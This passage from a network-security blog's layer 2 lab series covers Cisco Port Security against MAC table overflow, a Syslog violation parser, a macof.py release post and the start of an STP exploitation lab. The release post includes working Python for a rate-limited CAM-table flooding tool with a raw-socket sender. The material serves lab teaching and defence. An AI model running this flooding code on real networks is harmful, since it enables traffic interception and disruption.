On Cisco devices, this is achieved by enabling <a href="https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst4000/8-2glx/configuration/guide/sec_port.html" rel="external" title="Configuring Port Security (Cisco)">Port Security</a>.</p>
<p>As far as the virtual lab is concerned, while <span class="caps">IOU</span> doesn’t allow the attack
itself to be actually reproduced, using <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table overflow tools still increases the
number of entries in its <abbr title="Content Addressable Memory"><span class="caps">CAM</span></abbr>:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">show</span> mac address-table count vlan <span class="s">1</span>
<span class="go">Mac Entries for Vlan 1:</span>
<span class="go">---------------------------</span>
<span class="hll"><span class="go">Dynamic Address Count : 14604</span>
</span><span class="go">Static Address Count : 0</span>
<span class="go">Total Mac Addresses : 14604</span>
<span class="go">Total Mac Address Space Available: 183046404</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>Port Security must be enabled on a per-port basis on each access layer switch:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">IOU3(config)#</span><span class="k">int</span> range<span class="s"> ethernet 1/0 - 3</span>
<span class="gp">IOU3(config-if-range)#</span><span class="c1">! The port must explicitly be set to access mode.</span>
<span class="hll"><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> mode access
</span><span class="hll"><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> port-security
</span><span class="gp">IOU3(config-if-range)#</span><span class="c1">! By default only 1 MAC address allowed.</span>
<span class="hll"><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> port-security maximum <span class="s">5</span>
</span><span class="gp">IOU3(config-if-range)#</span><span class="nb">end</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:18:18.760: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU3#</span><span class="k">show</span> port-security
<span class="go">Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action</span>
<span class="go"> (Count) (Count) (Count)</span>
<span class="go">---------------------------------------------------------------------------</span>
<span class="go"> Et1/0 5 1 0 Shutdown</span>
<span class="go"> Et1/1 5 0 0 Shutdown</span>
<span class="go"> Et1/2 5 0 0 Shutdown</span>
<span class="go"> Et1/3 5 0 0 Shutdown</span>
<span class="go">---------------------------------------------------------------------------</span>
<span class="go">Total Addresses in System (excluding one mac per port) : 0</span>
<span class="go">Max Addresses limit in System (excluding one mac per port) : 4096</span>
<span class="gp">IOU3#</span>
<span class="gp">IOU3#</span><span class="k">copy</span> running-config startup-config
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">Compressed configuration from 1901 bytes to 1052 bytes[OK]</span>
<span class="gp">IOU3#</span>
</pre></div>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Port Security’s default limit is very low (one single <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address allowed per
port).
There are various reasons why more than one address may appear on a port:
the presence of an <span class="caps">IP</span> phone in addition to the workstation, the user may be
using virtual machines in bridged mode, the user may use a desktop switch to
share a wired connection with a colleague, etc.</p>
<p>Unless your policy explicitly forbids such situations, you will most likely
want to increase this value.
As far as preventing <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table flooding is concerned, there is no issue in
setting this value to a few dozen: this will still prevent attackers from
simulating thousands of devices while avoiding false positives that would
prevent legitimate users from doing their work.</p>
</div>
<p>Now attempting to run the attack causes the port to be automatically shut down,
isolating the offender:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:23:48.769: %PM-4-ERR_DISABLE: psecure-violation error detected on Et1/0, putting Et1/0 in err-disable state</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:23:48.769: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address a8bd.c94b.66e9 on port Ethernet1/0.</span>
<span class="gt">*Oct 22 17:23:49.769: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:23:50.769: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gp">IOU3#</span><span class="k">show</span> interfaces status err-disabled
<span class="go">Port Name Status Reason Err-disabled Vlans</span>
<span class="go">Et1/0 err-disabled psecure-violation</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>The port can be restored manually, the same way as with <a href="/posts/2017/10/16/spanning-tree-protocol-exploitation/#bpdu-guard-access-layer" title="STP vulnerability mitigation: BPDU Guard"><span class="caps">BPDU</span> Guard</a>:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">IOU3(config)#</span><span class="k">int</span><span class="s"> ethernet 1/0</span>
<span class="gp">IOU3(config-if)#</span><span class="k">shutdown</span>
<span class="gp">IOU3(config-if)#</span>
<span class="gt">*Oct 22 17:29:11.885: %LINK-5-CHANGED: Interface Ethernet1/0, changed state to administratively down</span>
<span class="gp">IOU3(config-if)#</span><span class="ow">no </span><span class="k">shutdown</span>
<span class="gp">IOU3(config-if)#</span>
<span class="gt">*Oct 22 17:29:15.077: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to up</span>
<span class="gt">*Oct 22 17:29:16.077: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to up</span>
<span class="gp">IOU3(config-if)#</span><span class="nb">end</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:32:31.808: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>And a timer can also be set to enable port auto-recovery:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="hll"><span class="gp">IOU3(config)#</span><span class="k">errdisable</span> recovery cause psecure-violation
</span><span class="gp">IOU3(config)#</span><span class="c1">! By default the timeout is set to 300 seconds (= 5 minutes), to change it:</span>
<span class="hll"><span class="gp">IOU3(config)#</span><span class="k">errdisable</span> recovery interval <span class="s">30</span>
</span><span class="gp">IOU3(config)#</span><span class="nb">end</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:35:13.030: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>Now the switch should be able to shut down the port during the attack, and
restore it afterwards:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:04.009: %PM-4-ERR_DISABLE: psecure-violation error detected on Et1/0, putting Et1/0 in err-disable state</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:04.009: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address c049.eef6.3ede on port Ethernet1/0.</span>
<span class="gt">*Oct 22 17:38:05.009: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:06.010: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:34.010: %PM-4-ERR_RECOVER: Attempting to recover from psecure-violation err-disable state on Et1/0</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:36.015: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to up</span>
<span class="gt">*Oct 22 17:38:37.023: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to up</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>Here we kept the default action, <code>shutdown</code>, which puts the port in
the err-disabled state and is the most brutal one.
When a Port Security violation occurs, two alternative actions can be selected:</p>
<ul>
<li>
<p><code>protect</code> silently drops frames bearing new <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> addresses once the
maximum number of addresses on this port has been reached, keeping the
port up and the connectivity for already registered <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> addresses.</p>
</li>
<li>
<p><code>restrict</code> does the same thing as <code>protect</code>, but in addition generates
a Syslog message to notify administrators and increments the port’s violation
counter.</p>
</li>
</ul>
<p>To select the <code>protect</code> mode instead of the default <code>shutdown</code>:</p>
<div class="codehilite"><pre><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> port-security violation protect
<span class="gp">IOU3(config-if-range)#</span>
</pre></div>
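<p>Whichever violation mode is chosen, <code>restrict</code> and <code>shutdown</code> only pay off if someone actually reads the Syslog messages they produce. The following is an added example, not code from the original post: it parses the <span class="caps">IOS</span> messages shown above (plus a few constructed lines of the same shape, simulating a second violation after auto-recovery), correlates them per port, and flags a port that keeps violating right after each recovery, which is the pattern an attacker relying on <code>errdisable recovery</code> would leave behind. The <code>window_s</code> threshold and the sample lines are assumptions made for the illustration.</p>

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple


class Event(NamedTuple):
    ts: datetime
    kind: str   # "violation", "errdisable" or "recover"
    port: str   # normalized short interface name, e.g. "Et1/0"
    mac: str    # offending MAC for violations, "" otherwise


# IOS prefixes timestamps with '*' when its clock is not authoritative; the year is not logged.
_TS = r"\*?(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}\.\d{3}): "
_PATTERNS = {
    "violation": re.compile(_TS + r"%PORT_SECURITY-2-PSECURE_VIOLATION: .*caused by MAC address "
                            r"(?P<mac>[0-9a-f.]+) on port (?P<port>\S+?)\.?$"),
    "errdisable": re.compile(_TS + r"%PM-4-ERR_DISABLE: psecure-violation error detected on (?P<port>\S+),"),
    "recover": re.compile(_TS + r"%PM-4-ERR_RECOVER: Attempting to recover from psecure-violation "
                          r"err-disable state on (?P<port>\S+)$"),
}

# Constructed sample: the messages shown above, followed by a second violation 36 s after
# the first recovery (recovery interval set to 30 s, as configured above).
SAMPLE_LOG = """\
*Oct 22 17:38:04.009: %PM-4-ERR_DISABLE: psecure-violation error detected on Et1/0, putting Et1/0 in err-disable state
*Oct 22 17:38:04.009: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address c049.eef6.3ede on port Ethernet1/0.
*Oct 22 17:38:34.010: %PM-4-ERR_RECOVER: Attempting to recover from psecure-violation err-disable state on Et1/0
*Oct 22 17:38:36.015: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to up
*Oct 22 17:39:10.200: %PM-4-ERR_DISABLE: psecure-violation error detected on Et1/0, putting Et1/0 in err-disable state
*Oct 22 17:39:10.200: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address 0200.4a1b.77c3 on port Ethernet1/0.
*Oct 22 17:39:40.300: %PM-4-ERR_RECOVER: Attempting to recover from psecure-violation err-disable state on Et1/0
"""


def short_ifname(name: str) -> str:
    """IOS names the same port 'Ethernet1/0' and 'Et1/0' in one log; keep the 2-letter form."""
    return re.sub(r"^([A-Za-z]{2})[A-Za-z]*", r"\1", name)


def parse_log(text: str) -> List[Event]:
    """Extract the Port Security related events, ignoring every other message."""
    events = []
    for line in text.splitlines():
        for kind, pat in _PATTERNS.items():
            m = pat.search(line)
            if m:
                ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S.%f")
                mac = m.groupdict().get("mac") or ""
                events.append(Event(ts, kind, short_ifname(m.group("port")), mac))
                break
    return events


def summarize(events: List[Event], window_s: float = 60.0) -> Dict[str, dict]:
    """Per port: violation count, offending MACs, recoveries, and whether a new violation
    followed a recovery within window_s (a port flapping through err-disable recovery)."""
    ports = defaultdict(lambda: {"violations": 0, "macs": set(), "recoveries": 0,
                                 "repeat_after_recovery": False})
    last_recover: Dict[str, datetime] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        p = ports[ev.port]
        if ev.kind == "violation":
            p["violations"] += 1
            p["macs"].add(ev.mac)
            since = last_recover.get(ev.port)
            if since is not None and (ev.ts - since).total_seconds() <= window_s:
                p["repeat_after_recovery"] = True
        elif ev.kind == "recover":
            p["recoveries"] += 1
            last_recover[ev.port] = ev.ts
    return dict(ports)


if __name__ == "__main__":
    for port, info in summarize(parse_log(SAMPLE_LOG)).items():
        print(port, info)
```

<p>A port reported with <code>repeat_after_recovery</code> set is a candidate for disabling auto-recovery (or switching it to <code>restrict</code>, which keeps logging without giving the attacker a periodic reconnection window); the offending <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> list is what you hand to whoever tracks down the device.</p>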
<p>Port Security also supports <em>sticky addresses</em>.
This is an intermediate solution between manually hardcoding end-nodes’ <abbr title="Media Access Control"><span class="caps">MAC</span></abbr>
addresses in the switch configuration and the dynamic learning process
described so far.
Here, newly learned addresses, up to the maximum allowed, become an integral part of the
switch running configuration: the aging time will not erase them, and if the running
configuration is saved as the startup configuration then they will also survive
switch reboots.</p>
<p>The sticky addresses setting is independent of the violation action setting:</p>
<div class="codehilite"><pre><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> port-security mac-address sticky
<span class="gp">IOU3(config-if-range)#</span>
</pre></div>
<div class="footnote">
<hr/>
<ol>
<li id="fn-n_is_stolen">
<p>Fortunately the story as a good ending and Naoki Hiroshima
managed to get back his <a href="https://twitter.com/N" rel="external" title="Naoki Hiroshima (Twitter)">Twitter account</a>, mainly thanks to
the fluff around this case and having done the headlines on several major
websites.
The whole process however took a full month, with Twitter somewhere in the
middle closing the account and <a href="https://twitter.com/N/status/428751111298621441" rel="external" title="It seems that Twitter simply ignored my claim and let somebody grab @N freely. Seriously? (Naoki Hiroshima Twitter account)">releasing it</a> the wild
for anyone to grab it instead of giving it back to its initial user.
Most users however won’t have the knowledge, time and energy to defend
themselves the way he did. <a class="footnote-backref" href="#fnref-n_is_stolen" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
</ol>
</div>macof.py is now available2017-10-25T00:00:00+02:002017-10-25T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-25:/posts/2017/10/25/macofpy-is-now-available/<p><code>macof.py</code> is a <span class="caps">MAC</span> address table overflow utility.</p>
<p>The traditional tool for <span class="caps">MAC</span> table overflow attacks is <code>macof</code> from the
<a href="https://www.monkey.org/~dugsong/dsniff/" rel="external" title="dsniff project homepage">dsniff</a> project.
However I was not satisfied with this tool.</p>
<p>In particular:</p>
<ul>
<li>
<p><code>macof</code> has no rate-limiting mechanism: it sends packets as fast as the
local <span class="caps">CPU</span> and the network adapter can support.</p>
<p>This leaves no room for a proper interception of users’ data.</p>
</li>
<li>
<p>Half of the packets generated by <code>macof</code> <a href="/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/#using-the-right-tool" title="How to run a CAM table overflow attack in GNS3">violate</a> the Ethernet
protocol by having the multicast bit set on the sender’s <span class="caps">MAC</span> address.</p>
<p>As a result, these packets are considered invalid and silently dropped by
the first switch they reach.</p>
<p>In other words, half of the packets generated by <code>macof</code> are generated
for nothing.</p>
</li>
<li>
<p><code>macof</code> constantly uses random <span class="caps">MAC</span> addresses for generated packets, meaning
that a given source <span class="caps">MAC</span> address is rarely used more than once.</p>
<p>This means that the switches’ <span class="caps">MAC</span> table aging mechanism will regularly purge all
malicious entries from the table.
Of course, the table will fill up again in a few seconds, but these seconds
may be enough for the switch to learn a few more legitimate addresses.
As a result, data destined to these addresses won’t be flooded to every port anymore.</p>
<p>In other words the interception process is, here again, unreliable.</p>
</li>
</ul>
<p>Most of these issues are probably due to the fact that this tool is now quite
old and seemingly unmaintained (last update in 2000).</p>
<p>I therefore decided to implement my own version, <code>macof.py</code>, compatible with
most options from dsniff’s <code>macof</code>:</p>
<ul>
<li>
<p><code>macof.py</code> allows tuning the frame emission rate to minimize the impact on
the attacker’s host and on the network resources as much as possible.</p>
<p>This offers a more reliable propagation of the forged <span class="caps">MAC</span> addresses
throughout the switched network and a more efficient interception of
flooded data.</p>
</li>
<li>
<p><code>macof.py</code> sends only valid frames, effectively updating switches <span class="caps">MAC</span>
address tables.</p>
</li>
<li>
<p><code>macof.py</code> first locally pre-generates a certain amount of Ethernet frames,
each with a unique random source <span class="caps">MAC</span> address, and then replays this same
set of frames in a loop for the whole attack duration.</p>
<p>This effectively simulates genuine devices’ activity, forcing the switches to
regularly reset the associated aging timers and keeping their <span class="caps">MAC</span> address
tables filled without interruption.</p>
</li>
</ul>
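<p>The three points above boil down to a small amount of code. What follows is an added illustration written for this page, not <code>macof.py</code>’s own implementation: it only generates frames whose source address has the multicast (I/G) bit clear, builds a fixed pool of frames once, and replays that same pool in a loop at a bounded rate through whatever <code>send</code> callback it is given. The pool size, rate and payload are arbitrary values chosen for the demonstration; the offline demo sends into a Python list, and <code>raw_sender()</code> shows how the same loop would be wired to a Linux <code>AF_PACKET</code> socket (which needs <code>CAP_NET_RAW</code> and is never opened by the tests).</p>

```python
import os
import socket
import struct
import time
from typing import Callable, List

ETHERTYPE_IPV4 = 0x0800
BROADCAST = b"\xff" * 6


def is_valid_source_mac(mac: bytes) -> bool:
    """A source MAC must be unicast: the I/G bit (LSB of the first octet) must be 0.
    Frames whose source has that bit set are exactly what dsniff's macof emits half
    of the time, and a switch will not learn such an address."""
    return len(mac) == 6 and (mac[0] & 0x01) == 0


def random_unicast_mac() -> bytes:
    """Random locally-administered (U/L bit set), unicast (I/G bit clear) address."""
    raw = bytearray(os.urandom(6))
    raw[0] = (raw[0] & 0xFE) | 0x02
    return bytes(raw)


def build_frame(src: bytes, dst: bytes = BROADCAST, payload: bytes = b"") -> bytes:
    """Minimal Ethernet II frame, payload padded to the 46-byte minimum (60-byte frame)."""
    if not is_valid_source_mac(src):
        raise ValueError("refusing to build a frame with a multicast source MAC")
    return dst + src + struct.pack("!H", ETHERTYPE_IPV4) + payload.ljust(46, b"\x00")


def pregenerate_frames(count: int) -> List[bytes]:
    """Fixed pool of frames, each with a unique random unicast source MAC."""
    frames, seen = [], set()
    while len(frames) < count:
        src = random_unicast_mac()
        if src not in seen:
            seen.add(src)
            frames.append(build_frame(src))
    return frames


def replay(frames: List[bytes], send: Callable[[bytes], None],
           rate_pps: float, total: int) -> int:
    """Cycle through the same pool at a bounded rate, so that every forged address is
    re-announced long before the switch's aging timer (typically 300 s) expires.
    Returns the number of frames handed to send()."""
    interval = 1.0 / rate_pps
    next_at = time.monotonic()
    sent = 0
    while sent < total:
        for frame in frames:
            if sent >= total:
                break
            delay = next_at - time.monotonic()
            if delay > 0:
                time.sleep(delay)
            send(frame)
            sent += 1
            next_at += interval
    return sent


def raw_sender(iface: str) -> Callable[[bytes], None]:
    """Linux-only AF_PACKET sender (requires CAP_NET_RAW); not used by the offline demo."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    sock.bind((iface, 0))

    def _send(frame: bytes) -> None:
        sock.send(frame)
    return _send


if __name__ == "__main__":
    pool = pregenerate_frames(1000)             # arbitrary pool size for the demo
    sink: List[bytes] = []                      # stands in for raw_sender("eth0")
    n = replay(pool, sink.append, rate_pps=2000, total=3000)
    print(f"sent {n} frames using {len({f[6:12] for f in sink})} distinct source MACs")
```

<p>Because the pool is replayed rather than regenerated, each cycle refreshes every forged entry; the rate simply has to be high enough for a full cycle to complete within the switches’ aging time, which is what keeps the table saturated without hammering the link.</p>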
<p>In addition, <code>macof.py</code>’s functionality can easily be reused in larger Python projects.</p>
<h3 id="get-it"><a class="toclink" href="#get-it">Get it</a></h3>
<p><em>macof.py</em> is <a href="https://github.com/WhiteWinterWolf/macof.py" rel="external" title="macof.py page on GitHub">freely available</a> (<span class="caps">GPL</span> v3).</p>
<p>Latest news on the project can be found on the <a href="/tags/macofpy/" title="macof.py project homepage">project’s main page</a>.</p>
<h3 id="install-it"><a class="toclink" href="#install-it">Install it</a></h3>
<p><code>macof.py</code> and its accompanying man page can be installed system-wide using the
following commands:</p>
<div class="codehilite"><pre>install -m 755 -D -t /usr/local/bin ./macof.py
mkdir -p /usr/local/share/man/man1
gzip -c ./macof.py.1 >/usr/local/share/man/man1/macof.py.1.gz
</pre></div>
<h3 id="documentation"><a class="toclink" href="#documentation">Documentation</a></h3>
<ul>
<li>
<p>The <a href="/man/1/macof.py/" title="macof.py(1) man page"><code>macof.py</code>(1) man page</a> describes <code>macof.py</code> usage and options.
It also provides advice and examples covering the most common use-cases.</p>
</li>
<li>
<p>You can also read this <a href="/posts/2017/10/25/mac-address-table-overflow/" title="MAC address table overflow">practical use-case</a>, part of a series
on network layer 2 exploitation and protection.</p>
</li>
</ul>
<h3 id="report-an-issue"><a class="toclink" href="#report-an-issue">Report an issue</a></h3>
<p>Please send bug reports to the <a href="http://github.com/WhiteWinterWolf/macof.py/issues" rel="external" title="macof.py issues (GitHub)">macof.py issues page</a> on GitHub.</p>Spanning Tree Protocol exploitation2017-10-16T00:00:00+02:002017-10-16T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-16:/posts/2017/10/16/spanning-tree-protocol-exploitation/<p>As we saw in the <a href="/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/#stp-messages" title="Passive reconnaissance: STP messages">previous post</a>, Wireshark showed us the presence
of <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages.</p>
<p>The Spanning Tree Protocol is used to detect topology loops and build the most
efficient loop-free forwarding path between interconnected switches.
Topology loops are not a mistake but a way to add redundancy to a topology.
Should a link break, <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> detects it and recalculates a new most
efficient tree.</p>
<p>In sane networks, access ports should neither deliver <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages to end-devices
nor accept any from them, but this is not the default and, as Wireshark told us, not the case in our lab.
This gives the attacker the possibility to simulate a topology change by sending
maliciously crafted <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages.</p>
<p>For this lab we will need <em>at least</em> the <em>User_1</em> and <em>Server_1</em> devices to be available:</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="STP lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/16/spanning-tree-protocol-exploitation/topology.png"/></a></span></p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>The support of <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> in the <abbr title="IOS On Unix"><span class="caps">IOU</span></abbr> images I tested was very buggy, <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> port
state was ignored and frames systematically forwarded, resulting in
broadcast storms in case of topology loops.</p>
<p>Due to this the topology must be modified (removal of the direct link
between <span class="caps">ESW2</span> and <span class="caps">ESW3</span>) and the <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> lab won’t work with <abbr title="IOS On Unix"><span class="caps">IOU</span></abbr>.</p>
</div>
<h3 id="initial-state"><a class="toclink" href="#initial-state">Initial state</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="partial" title="Partial"><span class="sr-only">Partial</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The Spanning Tree Protocol first elects a root device, and once a root has been
elected all other devices calculate the shortest path to this root.</p>
<p>During the initial <a href="/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/#router-based-ethernet-switches" title="Introduction: router-based ethernet switches">configuration stage</a>, we explicitly set <em><span class="caps">ESW1</span></em> to act
as the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root on all VLANs, building the following spanning tree:</p>
<p><span class="lb-small"><a href="#before.png" id="before.png-thumb" title="Click to enlarge"><img alt="Initial spanning tree" src="https://www.whitewinterwolf.com/posts/2017/10/16/spanning-tree-protocol-exploitation/before.png"/></a></span></p>
<p>The direct link between <em><span class="caps">ESW2</span></em> and <em><span class="caps">ESW3</span></em> is not used; instead all data is
sent straight up to the core switch <em><span class="caps">ESW1</span></em>.
This is indeed the most efficient way for end-users to reach the inter-<span class="caps">VLAN</span>
router and, from there, the <em>Servers</em> <span class="caps">VLAN</span>.</p>
<p>We can check the initial situation through the command-line:</p>
<ul>
<li>
<p><em><span class="caps">ESW1</span></em> is indeed the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root for all VLANs and all its ports are in
forwarding state.
We can also note <em><span class="caps">ESW1</span></em>’s <span class="caps">MAC</span> address, which is part of its Bridge ID:</p>
<div class="codehilite"><pre><span class="gp">ESW1#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="go"> Address c202.0a3e.0000</span>
<span class="hll"><span class="go"> This bridge is the root</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 8192</span>
<span class="hll"><span class="go"> Address c202.0a3e.0000</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 0 8192 c202.0a3e.0000 128.41</span>
<span class="go">FastEthernet1/1 128.42 128 19 FWD 0 8192 c202.0a3e.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 0 8192 c202.0a3e.0000 128.43</span>
<span class="go">FastEthernet1/3 128.44 128 19 FWD 0 8192 c202.0a3e.0000 128.44</span>
<span class="go">FastEthernet1/4 128.45 128 19 FWD 0 8192 c202.0a3e.0000 128.45</span>
<span class="gp">ESW1#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Depending on the device, you may or may not need to use the <code>brief</code>
keyword.</p>
</div>
</li>
<li>
<p><em><span class="caps">ESW2</span></em> shows the correct root <span class="caps">MAC</span> address and uses the expected port to
reach it.
All its interfaces are in forwarding state:</p>
<div class="codehilite"><pre><span class="gp">ESW2#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="hll"><span class="go"> Address c202.0a3e.0000</span>
</span><span class="go"> Cost 19</span>
<span class="hll"><span class="go"> Port 41 (FastEthernet1/0)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 32768</span>
<span class="go"> Address c203.0a4d.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 0 8192 c202.0a3e.0000 128.42</span>
<span class="go">FastEthernet1/1 128.42 128 19 FWD 19 32768 c203.0a4d.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 19 32768 c203.0a4d.0000 128.43</span>
<span class="gp">ESW2#</span>
</pre></div>
</li>
<li>
<p><em><span class="caps">ESW3</span></em> shows the correct root <span class="caps">MAC</span> address and uses the expected port to
reach it.
The redundant link to <em><span class="caps">ESW2</span></em> is blocked:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="hll"><span class="go"> Address c202.0a3e.0000</span>
</span><span class="go"> Cost 19</span>
<span class="hll"><span class="go"> Port 41 (FastEthernet1/0)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 32768</span>
<span class="go"> Address c204.0a5c.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 0 8192 c202.0a3e.0000 128.43</span>
<span class="hll"><span class="go">FastEthernet1/1 128.42 128 19 BLK 19 32768 c203.0a4d.0000 128.42</span>
</span><span class="go">FastEthernet1/2 128.43 128 19 FWD 19 32768 c204.0a5c.0000 128.43</span>
<span class="gp">ESW3#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Depending on devices’ <span class="caps">MAC</span> address, the redundant link may be blocked
either on <em><span class="caps">ESW2</span></em> or <em><span class="caps">ESW3</span></em> side.</p>
</div>
</li>
</ul>
<h3 id="attacks"><a class="toclink" href="#attacks">Attacks</a></h3>
<h4 id="stp-topology-change"><a class="toclink" href="#stp-topology-change"><abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> topology change</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="partial" title="Partial"><span class="sr-only">Partial</span></td></tr>
